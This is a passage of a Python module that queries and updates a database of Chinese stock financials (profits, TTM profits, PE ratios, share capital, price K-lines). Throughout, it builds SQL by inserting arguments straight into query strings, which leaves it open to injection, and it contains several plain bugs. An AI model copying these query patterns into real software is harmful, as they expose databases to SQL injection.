'归属于母公司所有者的净利润':\n logging.error('lirunFileToList read %s error', ts_code)\n return []\n\n return {'ts_code': ts_code,\n 'date': date,\n 'profits': profitsList[index],\n 'reportdate': dateList[index]\n }\n\n\n# def tablenameKline(ts_code):\n# return 'kline%s' % ts_code\n\n\ndef loadChigu():\n sql = 'select ts_code from chigu;'\n result = engine.execute(sql)\n return [i[0] for i in result.fetchall()]\n\n\ndef dropTable(tableName):\n engine.execute('DROP TABLE %s' % tableName)\n\n\ndef dropNAData():\n \"\"\" 清除K线图数据中交易量为0的数据\n \"\"\"\n # stockList = readts_codesFromSQL()\n # stockList = ['002100']\n # for ts_code in stockList:\n # tablename = tablenameKline(ts_code)\n # sql = 'delete from %(tablename)s where volume=0;' % locals()\n sql = 'delete from klinestock where volume=0;'\n engine.execute(sql)\n\n\ndef getLowPEStockList(maxPE=40):\n \"\"\"选取指定范围PE的股票\n maxPE: 最大PE\n \"\"\"\n sql = 'select ts_code, pe from stocklist where pe > 0 and pe <= %s' % maxPE\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef getAllMarketPEUpdateDate():\n \"\"\"\n 全市场PE更新日期\n :return:\n \"\"\"\n sql = 'select max(trade_date) from index_pe where ts_code=\"all\";'\n return _getLastUpdate(sql)\n\n\ndef getIndexPEUpdateDate():\n \"\"\"\n 指数PE更新日期,当前仅有上证180指数的PE值需手动计算\n :return:\n \"\"\"\n sql = f'select max(trade_date) from index_pe where ts_code=\"000010.SH\";'\n return _getLastUpdate(sql)\n\n\ndef getGuzhi(ts_code):\n sql = f'select * from guzhiresult where ts_code=\"{ts_code}\" limit 1'\n result = engine.execute(sql)\n return result.fetchone()\n\n\ndef readStockList():\n sql = 'select ts_code, name from stock_basic'\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef writeSQL(data: pd.DataFrame, tableName: str, replace=False):\n \"\"\"\n Dataframe格式数据写入tableName指定的表中\n replace: True,主键重复时更新数据, False, 忽略重复主键, 默认为False\n \"\"\"\n if data.empty:\n return True\n logging.debug('start writeSQL %s' % tableName)\n if not initsql.existTable(tableName):\n logging.error('not exist %s' % tableName)\n return False\n data = data.where(pd.notnull(data), None)\n data = datatrans.transDfToList(data)\n\n Base = declarative_base()\n\n class MyTable(Base):\n __table__ = Table(f'{tableName}', Base.metadata,\n autoload=True, autoload_with=engine)\n\n try:\n session = Session()\n metadata = MetaData(bind=engine)\n if replace:\n for d in data:\n # for index, row in data.iterrows():\n # tmpDict = row.to_dict()\n # tmpDict[data.index.name] = index\n # d = {key: getattr(row, key) for key in row.keys()}\n # for key in row.keys():\n # print('key type:', type(key))\n # print('value type:', type(getattr(row, key)))\n # print('value:', getattr(row, key))\n # table = MyTable(**tmpDict)\n table = MyTable(**d)\n session.merge(table)\n session.commit()\n else:\n mytable = Table(tableName, metadata, autoload=True)\n session.execute(mytable.insert().prefix_with('IGNORE'), data)\n session.commit()\n session.close()\n except Exception as e:\n print(e)\n print('写表失败: %s' % tableName)\n return False\n return True\n\n\ndef writets_codeListToFile(ts_codeList, filename):\n stockFile = open(filename, 'wb')\n stockFile.write(bytes('\\n').join(ts_codeList))\n stockFile.close()\n\n\ndef readGuzhiFileToDict(ts_code):\n \"\"\"\n 读取估值文件\n :rtype: dict\n :type ts_code: string\n :return dict\n \"\"\"\n guzhiFilename = filenameGuzhi(ts_code)\n guzhiFile = open(guzhiFilename)\n guzhiData = guzhiFile.read()\n guzhiFile.close()\n return datatrans.transGuzhiDataToDict(guzhiData)\n\n\ndef readGuzhiFilesToDf(stockList):\n guzhiList = []\n for ts_code in stockList:\n logging.debug('readGuzhiFilesToDf: %s', ts_code)\n guzhidata = readGuzhiFileToDict(ts_code)\n if guzhidata is not None:\n guzhiList.append(guzhidata)\n return DataFrame(guzhiList)\n\n\ndef readGuzhiSQLToDf(stockList):\n listStr = ','.join(stockList)\n sql = 'select * from guzhi where ts_code in (%s);' % listStr\n # result = engine.execute(sql)\n df = pd.read_sql(sql, engine)\n print(df)\n return df\n\n\ndef readValuationSammary():\n \"\"\"读取股票评分信息\"\"\"\n # 基本信息\n sql = ('select ts_code, name, date, pf, pe, peg, pe200, pe1000 '\n 'from valuation where date = (select max(date) from valuation) '\n 'order by pf desc;')\n stocks = pd.read_sql(sql, engine)\n\n # 行业名称\n sql = ('select a.ts_code, a.name, c.name as classify_name'\n ' from stock_basic a, classify_member b, classify c'\n ' where a.ts_code=b.ts_code and b.classify_code=c.code'\n ' order by ts_code;')\n hyname = pd.read_sql(sql, engine)\n stocks = pd.merge(stocks, hyname, how='left')\n\n # 财务指标\n sql = ('select a.ts_code, a.end_date as fina_date,'\n ' a.grossprofit_margin, a.roe'\n ' from fina_indicator a,'\n ' (select ts_code, max(end_date) as fina_date '\n ' from fina_indicator group by ts_code) b'\n ' where a.ts_code = b.ts_code and a.end_date = b.fina_date;')\n finastat = pd.read_sql(sql, engine)\n finastat['grossprofit_margin'] = finastat.grossprofit_margin.round(2)\n finastat['roe'] = finastat.roe.round(2)\n finastat = finastat[['ts_code', 'fina_date', 'grossprofit_margin', 'roe']]\n stocks = pd.merge(stocks, finastat, how='left')\n\n # 每日指标\n # sql = ('select a.ts_code, a.dv_ttm,'\n # ' from daily_basic a,'\n # ' (select ts_code, max(date) as daily_date'\n # ' from daily_basic group by ts_code) b'\n # ' where a.ts_code=b.ts_code and a.date = b.daily_date')\n sql = \"\"\"select a.ts_code, a.dv_ttm from daily_basic a,\n (select ts_code, max(trade_date) as daily_date \n from daily_basic group by ts_code) b\n where a.ts_code = b.ts_code and a.trade_date = b.daily_date;\"\"\"\n\n daily = pd.read_sql(sql, engine)\n stocks = pd.merge(stocks, daily, how='left')\n\n # 排序\n stocks.sort_values(by=['pf', 'pe'], ascending=(False, True), inplace=True)\n return stocks\n\n\ndef readValuation(ts_code):\n sql = (f'select * from valuation where ts_code=\"{ts_code}\"'\n 'order by date desc limit 1')\n result = engine.execute(sql).fetchone()\n return result\n\n\n# def downloadKline(ts_code, startDate=None, endDate=None):\n# if startDate is None: # startDate为空时取股票最后更新日期\n# startDate = getKlineUpdateDate(ts_code)\n# startDate = startDate.strftime('%Y-%m-%d')\n# if endDate is None:\n# endDate = dt.datetime.today().strftime('%Y-%m-%d')\n# return downloadKlineTuShare(ts_code, startDate, endDate)\n#\n#\n# def downloadKlineTuShare(ts_code,\n# startDate='1990-01-01', endDate='2099-12-31'):\n# try:\n# histDf = ts.get_hist_data(ts_code, startDate, endDate)\n# except IOError:\n# return None\n# return histDf\n\n\ndef readLirunList(date):\n sql = 'select * from lirun where `date` >= %s and `date` <= %s' % (\n str(date - 10), str(date))\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readPERate(ts_code):\n \"\"\" 读取一只股票的PE历史水平,\n # 返回PE200, PE1000两个数值,分别代表该股票当前PE值在过去200、1000个交易日中的水平\n \"\"\"\n sql = (f'select round(pe200, 2) pe200, round(pe1000, 2) pe1000'\n f' from guzhiresult where ts_code=\"{ts_code}\" limit 1')\n print(sql)\n # 指定日期(含)前无TTM利润数据的,查询起始日期设定为startDate\n # 否则设定为最近一次数据日期\n result = engine.execute(sql).fetchone()\n if result is None:\n return None, None\n else:\n return result\n\n\ndef readTTMProfits(ts_code: str, startDate=None, endDate=None):\n \"\"\"取指定股票一段日间的TTM利润,startDate当日无数据时,取之前最近一次数据\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519'\n startDate: date 起始日期 e.g: '1990-01-01'\n endDate: date 截止日期 e.g: '1990-01-01'\n\n Return\n --------\n DataFrame: 返回DataFrame格式TTM利润\n \"\"\"\n # 指定日期(含)前最近一次利润变动日期\n if startDate is None:\n return\n startDateStr = startDate.strftime('%Y-%m-%d')\n sql = ('select max(reportdate) from ttmlirun '\n 'where ts_code=\"%(ts_code)s\" '\n 'and reportdate<=\"%(startDateStr)s\"' % locals())\n # print sql\n # 指定日期(含)前无TTM利润数据的,查询起始日期设定为startDate\n # 否则设定为最近一次数据日期\n result = engine.execute(sql).fetchone()\n if result[0] is None:\n TTMLirunStartDate = startDateStr\n else:\n TTMLirunStartDate = result[0]\n sql = ('select * from ttmlirun where ts_code = \"%(ts_code)s\" '\n 'and `reportdate` >= \"%(TTMLirunStartDate)s\" '\n 'order by date' % locals())\n # print sql\n if endDate is not None:\n sql += ' and `date` <= \"%s\"' % endDate.strftime('%Y-%m-%d')\n df = pd.read_sql(sql, engine)\n\n # 指定日期(含)前存在股本变动数据的,重设第1次变动日期为startDate,\n # 减少更新Kline表中总市值所需计算量\n if TTMLirunStartDate != startDateStr:\n df.loc[df.reportdate == TTMLirunStartDate, 'reportdate'] = startDate\n return df\n\n\ndef readLastTTMProfit(ts_code, limit=1, date=None):\n \"\"\"取指定股票最近几期TTM利润\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519.SH'\n date: str 查询截止日期, e.g: '20191231'\n limit: 取最近期数的数据\n\n Return\n --------\n list: 返回list格式TTM利润\n \"\"\"\n sql = f'select incrate from ttmprofits where ts_code=\"{ts_code}\" '\n if date is not None:\n sql += f' and reportdate<=\"{date}\"'\n sql += f' order by date desc limit {limit}'\n # print sql\n result = engine.execute(sql).fetchall()\n result = [i[0] for i in reversed(result)]\n return result\n\n\ndef readLastTTMProfits(stockList, limit=1, date=None):\n \"\"\"取股票列表最近几期TTM利润\n Parameters\n --------\n :param stockList: str 股票代码 e.g: ['600519.SH', '002518.SZ']\n :param limit: 取最近期数的数据\n :param date:\n\n Return\n --------\n DataFrame: 返回DataFrame格式TTM利润\n \"\"\"\n TTMLirunList = []\n for ts_code in stockList:\n TTMLirun = readLastTTMProfit(ts_code, limit, date)\n TTMLirun.insert(0, ts_code)\n TTMLirunList.append(TTMLirun)\n\n # print TTMLirunList\n columns = ['incrate%s' % i for i in range(limit)]\n columns.insert(0, 'ts_code')\n TTMLirunDf = DataFrame(TTMLirunList, columns=columns)\n return TTMLirunDf\n\n\ndef readTTMProfitsForDate(date):\n \"\"\"从TTMLirun表读取某季度股票TTM利润\n date: 格式YYYYQ, 4位年+1位季度,利润所属日期\n return: 返回DataFrame格式TTM利润\n \"\"\"\n sql = ('select * from ttmlirun where '\n '`date` = \"%(date)s\"' % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readLirunForDate(date):\n \"\"\"从Lirun表读取一期股票利润\n date: 格式YYYYQ, 4位年+1位季度,利润所属日期\n return: 返回DataFrame格式利润\n \"\"\"\n sql = ('select * from lirun where '\n '`date` = \"%(date)s\"' % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readTTMPE(ts_code):\n \"\"\" 读取某支股票的全部TTMPE\n \"\"\"\n sql = ('select date, ttmpe from klinestock where ts_code=\"%(ts_code)s\";'\n % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readLastTTMPE(ts_code, date=None):\n \"\"\"读取指定股票指定日期的TTMPE,默认为最后一天的TTMPE\n\n :param ts_code: str\n 股票代码, 如'600013'\n :param date: str\n 指定日期, 格式'YYYYmmdd'\n :return:\n \"\"\"\n sql = (f'select pe_ttm from daily_basic where ts_code=\"{ts_code}\" '\n f'and trade_date=(select max(`trade_date`) from daily_basic where '\n f'ts_code=\"{ts_code}\"')\n if date is None:\n sql += ')'\n else:\n sql += f' and trade_date<={date})'\n\n result = engine.execute(sql).fetchone()\n if result is None:\n return None\n else:\n return result[0]\n\n\ndef readCal(startDate=None, endDate=None, exchange='SSE', is_open=1):\n sql = (f'select cal_date trade_date from trade_cal'\n f' where exchange=\"{exchange}\"')\n if startDate is not None:\n sql += f' and cal_date>=\"{startDate}\"'\n if endDate is not None:\n sql += f' and cal_date<=\"{endDate}\"'\n sql += f' and is_open={is_open}'\n result = engine.execute(sql).fetchall()\n return [d[0].strftime('%Y%m%d') for d in result]\n\n\ndef readLastTTMPEs(stockList, trade_date=None):\n \"\"\"\n 读取stockList中股票指定日期的TTMPE, 默认取最后一天的TTMPE\n :param stockList: list\n 股票列表\n :param trade_date: str\n 'YYYYmmdd'格式的日期\n :return:\n \"\"\"\n sql = 'select ts_code, pe_ttm pe from daily_basic where trade_date='\n if trade_date is None:\n sql += '(select max(trade_date) from daily_basic)'\n else:\n sql += f'\"{trade_date}\"'\n\n result = engine.execute(sql).fetchall()\n if not result:\n logging.warning(f'缺少{trade_date}每日指标')\n return None\n df = pd.read_sql(sql, engine)\n # ts_codes, ttmpes = zip(*result)\n # df = pd.DataFrame({'ts_code': ts_codes, 'pe': ttmpes})\n df = df.loc[df['ts_code'].isin(stockList)]\n df = df.dropna()\n return df\n\n\n# def alterKline():\n# sql = 'show tables like %s'\n# result = engine.execute(sql, 'kline%')\n# result = result.fetchall()\n#\n# for i in result:\n# tablename = i[0]\n# sql = 'call stockdata.alterkline(%s)'\n# try:\n# engine.execute(sql, tablename)\n# # result = result.fetchall()\n# print(tablename)\n# except sqlalchemy.exc.OperationalError as e:\n# print(e)\n# return\n\n\ndef calAllTTMLirun(date, incrementUpdate=True):\n \"\"\"计算全部股票本期TTM利润并写入TTMLirun表\n date: 格式YYYYQ, 4位年+1位季度\n incrementUpdate: True, 增量更新, False, 覆盖已有数据的更新方式\n # 计算公式: TTM利润 = 本期利润 + 上年第四季度利润 - 上年同期利润\n # 计算原理:TTM利润为之前连续四个季度利润之和\n # 本期利润包含今年以来产生所有利润,上年第四季度利润 减上年同期利润为上年同期后一个季度至年末利润\n # 两者相加即为TTM利润\n # 举例:2016年1季度TTM利润 = 2016年1季度利润 + 2015年4季度利润 - 2015年1季度利润\n # 数据完整的情况下等同于:\n # 2015年2季度利润 + 2015年3季度利润 + 2015年4季度利润 + 2016年1季度利润\n # 当本期为第4季度时,计算公式仍有效, 如:\n # 2016年4季度TTM利润 = 2016年4季度利润 + 2015年4季度利润 - 2015年4季度利润\n # 但为提高效率,当本期为第4季度时,TTM利润=本期利润, 直接返回利润数据\n \"\"\"\n lirunCur = readLirunForDate(date)\n if (date % 10) == 4:\n TTMLirun = lirunCur.copy()\n TTMLirun.columns = ['ts_code', 'date', 'ttmprofits', 'reportdate']\n # return writeSQL(TTMLirun, 'ttmlirun')\n else:\n if incrementUpdate:\n TTMLirunCur = readTTMProfitsForDate(date)\n lirunCur = lirunCur[~lirunCur.ts_code.isin(TTMLirunCur.ts_code)]\n\n # 上年第四季度利润, 仅取利润字段并更���为profits1\n lastYearEnd = (date // 10 - 1) * 10 + 4\n lirunLastYearEnd = readLirunForDate(lastYearEnd)\n print(('lirunLastYearEnd.head():', lirunLastYearEnd.head()))\n lirunLastYearEnd = lirunLastYearEnd[['ts_code', 'profits']]\n lirunLastYearEnd.columns = ['ts_code', 'profits1']\n\n # 上年同期利润, 仅取利润字段并更名为profits2\n lastYearQuarter = date - 10\n lirunLastQarter = readLirunForDate(lastYearQuarter)\n lirunLastQarter = lirunLastQarter[['ts_code', 'profits']]\n lirunLastQarter.columns = ['ts_code', 'profits2']\n\n # 整合以上三个季度利润,ts_code为整合键\n TTMLirun = pd.merge(lirunCur, lirunLastYearEnd, on='ts_code')\n TTMLirun = pd.merge(TTMLirun, lirunLastQarter, on='ts_code')\n\n TTMLirun['ttmprofits'] = (TTMLirun.profits +\n TTMLirun.profits1 - TTMLirun.profits2)\n TTMLirun = TTMLirun[['ts_code', 'date', 'ttmprofits', 'reportdate']]\n print('TTMLirun.head():\\n', TTMLirun.head())\n\n # 写入ttmlirun表后,重算TTM利润增长率\n if incrementUpdate:\n writeSQL(TTMLirun, 'ttmlirun')\n else:\n replaceTTMLinrun(TTMLirun)\n\n return calTTMLirunIncRate(date)\n\n\ndef replaceTTMLinrun(df):\n \"\"\"\n 以替换方式更新TTM利润,用于批量修正TTM利润表错误\n :param df:\n :return:\n \"\"\"\n for index, row in df.iterrows():\n # print(row['ts_code'])\n ts_code = row['ts_code']\n _date = row['date']\n ttmprofits = row['ttmprofits']\n reportdate = row['reportdate']\n sql = ('replace into ttmlirun(ts_code, date, ttmprofits, reportdate) '\n 'values(\"%(ts_code)s\", %(_date)s, '\n '%(ttmprofits)s, \"%(reportdate)s\");' % locals())\n print(sql)\n engine.execute(sql)\n\n\ndef calTTMLirunIncRate(date, incrementUpdate=True):\n \"\"\"计算全部股票本期TTM利润增长率并写入TTMLirun表\n date: 格式YYYYQ, 4位年+1位季度\n # 计算公式: TTM利润增长率= (本期TTM利润 - 上年同期TTM利润) / TTM利润 * 100\n \"\"\"\n TTMLirunCur = readTTMProfitsForDate(date)\n if incrementUpdate:\n TTMLirunCur = TTMLirunCur[TTMLirunCur.incrate.isnull()]\n TTMLirunLastYear = readTTMProfitsForDate(date - 10)\n TTMLirunLastYear = TTMLirunLastYear[['ts_code', 'ttmprofits']]\n TTMLirunLastYear.columns = ['ts_code', 'ttmprofits1']\n TTMLirunLastYear = TTMLirunLastYear[TTMLirunLastYear.ttmprofits1 != 0]\n\n # 整合以上2个表,ts_code为整合键\n TTMLirunCur = pd.merge(TTMLirunCur, TTMLirunLastYear, on='ts_code')\n\n TTMLirunCur['incrate'] = ((TTMLirunCur.ttmprofits -\n TTMLirunCur.ttmprofits1) /\n abs(TTMLirunCur.ttmprofits1) * 100)\n for i in TTMLirunCur.values:\n ts_code = i[0]\n incRate = round(i[4], 2)\n sql = ('update ttmlirun '\n 'set incrate = %(incRate)s'\n ' where ts_code = \"%(ts_code)s\"'\n 'and `date` = %(date)s' % locals())\n engine.execute(sql)\n return\n\n\ndef calTTMLirun(stockdf, date):\n lirun1 = stockdf[stockdf.date == date - 10] # 上年同期利润\n lirun2 = stockdf[stockdf.date == (date / 10 - 1) * 10 + 4] # 上年末利润\n lirun3 = stockdf[stockdf.date == date] # 本期利润\n if lirun1.empty or lirun2.empty or lirun3.empty:\n return None\n lirun1 = lirun1.iat[0, 2]\n lirun2 = lirun2.iat[0, 2]\n ts_code = lirun3.iat[0, 0]\n reportdate = lirun3.iat[0, 3]\n lirun3 = lirun3.iat[0, 2]\n # TTM利润 = 本期利润+上年末利润-上年同期利润\n lirun = lirun3 + lirun2 - lirun1\n return [ts_code, date, lirun, reportdate]\n\n\ndef getLirunUpdateEndQuarter():\n curQuarter = datatrans.transDateToQuarter(dt.datetime.now())\n return datatrans.quarterSub(curQuarter, 1)\n\n\ndef _getLastUpdate(sql):\n \"\"\"\n Parameters\n --------\n sql: str 指定查询更新日期的SQL语句\n e.g: 'select ttmpe from lastupdate where ts_code=\"002796\"'\n\n Return\n --------\n datetime:datetime\n \"\"\"\n result = engine.execute(sql).first()\n if result is None:\n return dt.datetime.strptime('1990-01-01', '%Y-%m-%d').date()\n\n lastUpdateDate = result[0]\n if lastUpdateDate is None:\n return dt.datetime.strptime('1990-01-01', '%Y-%m-%d').date()\n\n # lastUpdateDate = lastUpdateDate[0]\n if isinstance(lastUpdateDate, dt.date):\n return lastUpdateDate\n # return lastUpdateDate + dt.timedelta(days=1)\n else:\n logging.debug('lastUpdateDate type is: %s', type(lastUpdateDate))\n return dt.datetime.strptime(lastUpdateDate, '%Y-%m-%d').date()\n\n\ndef writeChigu(stockList):\n engine.execute('TRUNCATE TABLE chigu')\n for ts_code in stockList:\n sql = ('insert into chigu (`ts_code`) '\n 'values (\"%s\");') % ts_code\n engine.execute(sql)\n\n\n# def savePELirunIncrease(startDate='2007-01-01', endDate=None):\n# stockList = readStockListFromSQL()\n# for ts_code, stockName_ in stockList:\n# # sql = (u'insert ignore into pelirunincrease(ts_code, date, pe) '\n# # u'select \"%(ts_code)s\", date, ttmpe '\n# # u'from klinestock%(ts_code)s '\n# # u'where `date`>=\"%(startDate)s\";') % locals()\n# #\n# # engine.execute(sql)\n#\n# TTMLirunDf = readTTMProfits(ts_code, startDate)\n# TTMLirunDf = TTMLirunDf.dropna().reset_index(drop=True)\n# klineTablename = 'klinestock'\n# TTMLirunCount = len(TTMLirunDf)\n# for i in range(TTMLirunCount):\n# incrate = TTMLirunDf['incrate'].iloc[i]\n# startDate_ = TTMLirunDf['reportdate'].iloc[i]\n# try:\n# endDate_ = TTMLirunDf['reportdate'].iloc[i + 1]\n# except IndexError:\n# endDate_ = None\n#\n# sql = ('update pelirunincrease '\n# 'set lirunincrease = %(incrate)s'\n# ' where ts_code=\"%(ts_code)s\"'\n# ' and date>=\"%(startDate_)s\"') % locals()\n# if endDate_ is not None:\n# sql += (' and date<\"%(endDate_)s\"' % locals())\n# engine.execute(sql)\n#\n#\n# # break\n\n\n# def setKlineTTMPELastUpdate(ts_code, endDate):\n# sql = ('insert into lastupdate (`ts_code`, `ttmpe`) '\n# 'values (\"%(ts_code)s\", \"%(endDate)s\") '\n# 'on duplicate key update `ttmpe`=\"%(endDate)s\";' % locals())\n# result = engine.execute(sql)\n# return result\n\n\ndef setGubenLastUpdate(ts_code, endDate=None):\n sql = ('insert into lastupdate (`ts_code`, `guben`) '\n 'values (\"%(ts_code)s\", \"%(endDate)s\") '\n 'on duplicate key update `guben`=\"%(endDate)s\";' % locals())\n result = engine.execute(sql)\n return result\n\n\ndef del_updateKlineTTMPE(ts_code, startDate, endDate=None):\n \"\"\"\n # 更新Kline表TTMPE\n \"\"\"\n # engine = getEngine()\n if startDate is None:\n return\n\n startDateStr = startDate.strftime('%Y-%m-%d')\n klineTablename = 'klinestock'\n sql = ('update %(klineTablename)s '\n 'set ttmpe = round(totalmarketvalue / ttmprofits, 2)'\n ' where ts_code=\"%(ts_code)s\" and date>=\"%(startDateStr)s\"'\n % locals())\n if endDate:\n sql += ' and date < \"%s\"' % endDate\n sql += ' and totalmarketvalue is not null'\n sql += ' and ttmprofits is not null'\n unusedResult = engine.execute(sql)\n sql = f'select max(date) from klinestock where ts_code=\"{ts_code}\"'\n result = engine.execute(sql)\n endDate = result.fetchone()[0]\n if endDate is not None:\n endDate = endDate.strftime('%Y-%m-%d')\n else:\n endDate = (dt.datetime.today() - dt.timedelta(days=1))\n endDate = endDate.strftime('%Y-%m-%d')\n return endDate\n\n\ndef readGuben(ts_code, startDate=None, endDate=None):\n \"\"\"取指定股票一段日间的股本变动数据,startDate当日无数据时,取之前最近一次变动数据\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519'\n startDate: str 起始日期 e.g: '1990-01-01'\n endDate: str 截止日期 e.g: '1990-01-01'\n\n Return\n --------\n DataFrame\n date: 股本变动日期\n totalshares: 变动后总股本\n \"\"\"\n # 指定日期(含)前最近一次股本变动日期\n if startDate is None:\n return\n startDateStr = startDate.strftime('%Y-%m-%d')\n sql = ('select max(date) from guben '\n 'where ts_code=\"%(ts_code)s\" '\n 'and date<=\"%(startDateStr)s\"' % locals())\n result = engine.execute(sql)\n lastUpdate = result.fetchone()[0]\n\n # 指定日期(含)前无股本变动数据的,查询起始日期设定为startDate\n # 否则设定为最近一次变动日期\n if lastUpdate is None:\n gubenStartDate = startDateStr\n else:\n gubenStartDate = lastUpdate.strftime('%Y-%m-%d')\n\n sql = ('select date, totalshares from guben '\n 'where ts_code = \"%(ts_code)s\"'\n ' and `date`>=\"%(gubenStartDate)s\"' % locals())\n if endDate:\n sql += ' and `date` <= \"%s\"' % endDate.strftime('%Y-%m-%d')\n df = pd.read_sql(sql, engine)\n\n # 指定日期(含)前存在股本变动数据的,重设第1次变动日期为startDate,\n # 减少更新Kline表中总市值所需计算量\n if lastUpdate is not None:\n gbdate = datetime.strptime(gubenStartDate, '%Y-%m-%d').date()\n df.loc[df['date'] == gbdate, 'date'] = startDateStr\n return df\n\n\ndef readGubenUpdateList():\n \"\"\" 比较股票已存股本数据与最新股数据,不相同时则表示需要更新的股票\n \"\"\"\n sql = 'select ts_code, totals as totalsnew from stocklist;'\n dfNew = pd.read_sql(sql, engine)\n\n # dfNew = ts.get_stock_basics()\n # dfNew = dfNew.reset_index()\n # dfNew = dfNew[['code', 'totals']]\n # dfNew.columns = ['ts_code', 'totalsnew']\n sql = ('SELECT ts_code, totalshares as totalsold '\n 'FROM (select * from stockdata.guben order by date desc) '\n 'as tablea group by ts_code;')\n dfOld = pd.read_sql(sql, engine)\n dfOld.totalsold = dfOld.totalsold / 100000000\n dfOld = dfOld.round(2)\n updateList = pd.merge(dfNew, dfOld, on='ts_code', how='left')\n updateList.fillna({'totalsold': 0}, inplace=True)\n updateList = updateList[abs(\n updateList.totalsnew - updateList.totalsold) > 0.1]\n return updateList.ts_code\n\n\ndef readClose(ts_code):\n sql = ('select date, close from klinestock where ts_code=\"%(ts_code)s\";'\n % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readCurrentClose(ts_code):\n sql = (f'select close from daily where ts_code=\"{ts_code}\" '\n f' and trade_date=(select max(`trade_date`)'\n f' from daily where ts_code=\"{ts_code}\")')\n result = engine.execute(sql)\n return result.fetchone()[0]\n\n\ndef readCurrentPEG(ts_code):\n sql = 'select peg from guzhiresult where ts_code=\"%s\" limit 1' % ts_code\n logging.info(sql)\n result = engine.execute(sql)\n try:\n result = result.fetchone()[0]\n except TypeError:\n return None\n else:\n return result\n\n\ndef getts_codesForClassified(classified):\n sql = ('select ts_code from classified '\n 'where cname = \"%(classified)s\"' % locals())\n result = engine.execute(sql)\n ts_codeList = [classifiedID[0] for classifiedID in result.fetchall()]\n return ts_codeList\n\n\ndef classifiedToSQL(classifiedDf):\n \"\"\" 旧版写行业分类到数据库, 计划删除本函数\n \"\"\"\n tablename = 'classified'\n return writeSQL(classifiedDf, tablename)\n\n\ndef getChiguList():\n # sql = ('select chigu.ts_code, stocklist.name from chigu, stocklist '\n # 'where chigu.ts_code=stocklist.ts_code')\n sql = 'select ts_code from chigu'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\ndef getGuzhiList():\n # sql = ('select guzhiresult.ts_code, stocklist.name '\n # 'from guzhiresult, stocklist '\n # 'where guzhiresult.ts_code=stocklist.ts_code')\n sql = 'select ts_code from youzhiguzhi'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\n# return result.fetchall()\n\n\ndef getYouzhiList():\n # sql = ('select youzhiguzhi.ts_code, stocklist.name '\n # 'from youzhiguzhi, stocklist '\n # 'where youzhiguzhi.ts_code=stocklist.ts_code')\n # sql = 'select ts_code from guzhiresult'\n sql = 'select ts_code from youzhiguzhi'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\ndef getClassifiedForStocksID(ts_code):\n sql = ('select cname from classified '\n 'where ts_code = \"%(ts_code)s\"' % ts_code)\n result = engine.execute(sql)\n classified = result.first()[0]\n return classified\n\n\ndef getStockName(ts_code):\n sql = f'select name from stock_basic where ts_code=\"{ts_code}\";'\n result = engine.execute(sql).first()\n if result is not None:\n return result[0]\n else:\n return None\n\n\ndef readStockKline(ts_code, startDate=None, endDate=None, days=0):\n \"\"\"\n 读取股票K线数据\n :param endDate:\n :param startDate:\n :param ts_code: str, 6位股票代码\n :param days: int, 读取的天数\n :return: Dataframe\n klineDf = pd.DataFrame({'date': dateList,\n 'open': openList,\n 'close': closeList,\n 'high': highList,\n 'low': lowList,\n 'pe': peList})\n \"\"\"\n sql = (f'select a.trade_date, a.open, a.high, a.low, a.close, b.pe_ttm'\n f' from daily a, daily_basic b where a.ts_code=\"{ts_code}\" ')\n if startDate is not None:\n sql += f' and a.trade_date>=\"{startDate}\"'\n if endDate is not None:\n sql += f' and a.trade_date<=\"{endDate}\"'\n sql += f' and a.ts_code=b.ts_code and a.trade_date=b.trade_date'\n if days != 0:\n sql += f' order by a.trade_date desc limit {days}'\n return _readKline(sql)\n\n\ndef readProfitsIncAdf():\n stocks = pd.read_excel('data/profits_inc_adf_linear.xlsx')\n stocks = stocks.round(2)\n # stocks = stocks[(stocks['mean'] >= 10) &\n # (stocks.sharp >= 0.8) &\n # (stocks.pe_ttm <= 30)]\n stocks = stocks[(stocks['r2'] >= 0.3) & (stocks['coef'] > 0)]\n stocks.sort_values('sharp', ascending=False, inplace=True)\n return stocks\n\n\ndef readIndexKline(index_code, days):\n \"\"\"\n 读取指数K线数据\n :param index_code: str, 9位指数代码\n :param days: int, 读取的天数\n :return: Dataframe\n indexDf = pd.DataFrame({'date': dateList,\n 'open': openList,\n 'close': closeList,\n 'high': highList,\n 'low': lowList,\n 'pe': peList})\n \"\"\"\n peTable = 'index_pe' if index_code == '000010.SH' else 'index_dailybasic'\n sql = (f'select a.trade_date, a.open, a.high, a.low, a.close, b.pe_ttm '\n f' from index_daily a, {peTable} b '\n f' where a.ts_code=\"{index_code}\" and a.ts_code=b.ts_code '\n f' and a.trade_date=b.trade_date'\n f' order by trade_date desc limit {days};')\n df = _readKline(sql)\n # df = pd.read_sql(sql, engine)\n # df.rename(columns={'pe_ttm': 'pe'}, inplace=True)\n # df['date'] = df.trade_date.apply(lambda x: x.strftime('%Y%m%d'))\n # df.sort_values(by='date', inplace=True)\n # df.set_index(keys='date', inplace=True)\n # df.reset_index(inplace=True)\n # df.sort_values(by='trade_date', inplace=True)\n return df\n\n\ndef _readKline(sql):\n df = pd.read_sql(sql, engine)\n df.rename(columns={'trade_date': 'date', 'pe_ttm': 'pe'}, inplace=True)\n df.date = pd.to_datetime(df.date)\n df = df.set_index('date')\n df = df.sort_index()\n df = df.reset_index()\n return df\n # result = engine.execute(sql).fetchall()\n # stockDatas = [i for i in reversed(result)]\n # # klineDatas = []\n # dateList = []\n # openList = []\n # closeList = []\n # highList = []\n # lowList = []\n # peList = []\n # indexes = list(range(len(result)))\n # for i in indexes:\n # date, _open, high, low, close, ttmpe = stockDatas[i]\n # dateList.append(date.strftime(\"%Y-%m-%d\"))\n # # QuarterList.append(date)\n # openList.append(_open)\n # closeList.append(close)\n # highList.append(high)\n # lowList.append(low)\n # peList.append(ttmpe)\n # klineDf = pd.DataFrame({'date': dateList,\n # 'open': openList,\n # 'close': closeList,\n # 'high': highList,\n # 'low': lowList,\n # 'pe': 